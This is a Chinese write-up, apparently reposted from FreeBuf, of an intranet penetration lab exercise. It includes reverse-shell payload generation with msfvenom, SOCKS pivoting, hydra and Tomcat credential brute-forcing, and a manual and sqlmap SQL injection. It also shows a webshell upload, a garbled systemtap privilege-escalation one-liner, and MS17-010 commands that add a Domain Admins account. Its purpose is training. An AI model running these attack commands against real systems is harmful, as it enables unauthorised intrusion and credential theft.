记一次糟心的内网靶场实战
发布时间:2020-11-24 20:21:11来源:FreeBuf
一开始的时候对整个内网的拓扑结构还不熟,所以做的时候有很多方法都没有想到去用,大家多多指教。
用网线连接交换机
配置Winodwss攻击机IP为172.16.6.203
攻击机KaliIP为172.16.6.202
主机IP为172.16.6.201
网关为172.16.6.1
子网掩码255.255.255.0
目标IP172.16.6.10
一开始以为192.168.6.200,一台普通的双网卡主机,没有发现是防火墙,所以10.1.1.0网段的主机拓扑不够清晰,后来老师讲了才知道,防火墙做了端口映射。E主机的445端口映射到防火墙445端口,F主机的3389端口映射到防火墙的3389端口。
访问主页。发现伪协议注入点。
http://172.16.6.10/index.php?page=php://input
使用菜刀连接,菜刀版本需2020年的版本。
查看phpinfo目标主机为Linux系统的主机。
Msf生成木马msfvenom-plinux/x86/meterpreter/reverse_tcpLHOST=172.16.6.147LPORT=2337-felf-ax86—platformlinux-o/home/hula.elf
并useexploit/multi/handle模块监听木马回连情况。
将木马通过菜刀上传木马,赋予运行权限,然后执行。
发现回连到meterpreter。
ipconfig查看网卡信息,发现有两个网段的IP,分别为172.16.6.10和192.168.6.10。
自动添加路由runpost/multi/manage/autoroute。
添加路由与代理:
useauxiliary/server/socks4a
showoptions
setsrvhost172.16.6.147
setsrvport1080
使用portscan模块进行端口扫描
searchportscan
setrhosts192.168.6.0/24。
ipconfig查看网卡信息,发现有两个网段的IP,分别为172.16.6.10和192.168.6.10
给msf添加192.168.6.10段的路由,runautoroute-s192.168.6.0/24
添加代理:
useauxiliary/server/socks4a
showoptions
srvhost设为本机
srvport默认1080
可以看到扫描出15、16、17、200四台主机,端口开放情况为
192.168.6.1521/22
192.168.6.1622/80/3306/8080
192.168.6.1722/80/3306
192.168.6.20080/135/445/3389
用一句话提权
printf“installuprobes/bin/sh”>exploit.conf;MODPROBE_OPTIONS=”-Cexploit.conf”staprun-uwhateverexploit.conf”staprun-uwhatever>exploit.conf;MODPROBE_OPTIONS=”-C
因为目标机开放了21端口,用hydra爆破ftp弱密码。
proxychainshydra-L/usr/wordlists/字典/Usernames/top_shortlist.txt-P/usr/wordlists/rockyou.txt-f-t50-vVssh://192.168.6.15-o./ssh.log
爆破出账号为admin,密码为123456
proxychainsftp192.168.6.15,登陆后用dir命令发现报错
使用xshell连接,发现可以连接。
由于目标主机开发了8080端口,猜测有tomcat漏洞。
访问网页192.168.6.16:8080发现有tomcat页面。
下面尝试利用MSF爆破tomcat的账号密码,利用auxiliary/scanner/http/tomcat_mgr_login模块,除了设置目标IP,用户名字典,密码字典外,再设置stop_on_success为true,意思是baopochen成功后停止。
默认管理后台路径为manager/html,也不用改,端口也不用改。成功爆破得到账号密码为tomcat/tomcat
使用msf中upload、deploy两个模块的tomcat漏洞发现无法绑定IP和端口。
使用msf生成war木马文件。然后使用监听模块监听木马回连情况。
msfvenom-pjava/meterpreter/reverse_tcpLHOST=192.168.6.10LPORT=20003-fwar>lmx3.war
在下面的页面上传war木马文件。
在网页上查看自己的木马,返回msf发现已返回meterpreter
访问该站点。
kali下敏感目录扫描工具Nikto使用:攻击机:172.16.6.147(kalilinux)、靶机:192.168.6.17(Metasploitable2-Linux)、使用Nikto进行敏感目录扫描、参数解析:-h/-host指定域名或者IP、发现这个敏感目录扫描不够强大。
发现sql注入点http://192.168.6.17/message.php?id=
用手工简单的测试了下:
http://192.168.6.17/message.php?id=1页面正常
http://192.168.6.17/message.php?id=1orderby1页面正常
http://192.168.6.17/message.php?id=1orderby100页面不正常
所以存在注入漏洞
sqlmap跑出数据库的密码
proxychainssqlmap-r/home/17tou.txt—batch–dbs
proxychainssqlmap-r/home/17tou.txt—batch—dbs-Tadmin–dump
最后爆出账号是admin,密码是xxxxxxx,使用md5解密
利用账号密码成功登录192.168.6.17的后台
浏览页面,发现有一个文件上传的注入点。上传木马,f12发现木马上传的位置与命名。
http://192.168.6.17/upload/images/20201022123044.php
在win10上安装sockscap,管理员身份运行,代理设置kali的IP地址,端口1080。在sockscap上添加菜刀程序。使用菜刀连接木马。
通过菜刀连接,发现目标主机为Linux系统。
用MSF生成的反弹木马,然后起监听。
msfvenom-plinux/x86/meterpreter/reverse_tcpLHOST=192.168.6.10LPORT=2339-felf-ax86—platformlinux-o/home/biu.elf
通过菜刀上传到目标主机,赋予权限,然后运行。发现不能弹回meterpreter。
因为发现目标开放了80,所以访问下web站点
在kali自带的火狐浏览器中设置socks代理,访问192.168.6.200,发现页面提示输入账号密码。尝试了弱口令的账号密码,发现无法人工爆破。
由于目标开放了445端口,所以怀疑可能存在永恒之蓝漏洞。
使用ms17-010的command模块进行攻击。
添加用户,并添加至管理员组(或者直接修改administrator管理员密码)
setcommand‘netusercbrCbr123456/add‘setcommand‘net“DomainAdmins”cbr/add/domain’
用命令setcommand‘netgroup“DomainAdmins”‘来查看是否成功添加到域管理员组。
proxychainsrdesktop192.168.6.200
查看IP信息ipconfig/all,发现目标主机在域里面。网关为10.1.1.1,还有一个地址为10.1.1.200,以为目标主机位双网卡,但没有发现目标主机的地址192.168.6.200的存在,惊天大怪事啊。后来讲解的时候才知道,这里是做了端口映射。
由于目标开放了445端口,所以怀疑可能存在永恒之蓝漏洞。
继续用17010执行高权限命令的模块进行攻击:
添加用户,并添加至管理员组(或者直接修改administrator管理员密码)
setcommand‘netusercbrCbr123456/add‘setcommand‘net“DomainAdmins”cbr/add/domain’
用命令setcommand‘netgroup“DomainAdmins”‘来查看是否成功添加到域管理员组。
发现已经成功添加到域管理员组
远程登录10.1.1.200
使用共享文件proxychainsrdesktop10.1.1.200-rdisk:aa=/home
远程登录administrator
上传木马并运行,发现meterpreter弹不回来,遂放弃
以10.1.1.10为目标地址,使用msf的ms17-010模块攻击,发现操作并没有在10.1.1.10上执行,而是在192.168.6.200上执行。猜测是进行了端口映射。
所以将192.168.6.200作为中间机器,使用lcx,但发现无法实现端口转发。
使用xshell建立192.168.6.200与10.1.1.10之间的隧道,但发、法建立。遂放弃。
最后
通过ms17-010的command模块可以添加用户,但是command后面的指令要加单引号,因为是长命令。
远程登录10.1.1.10
精彩推荐
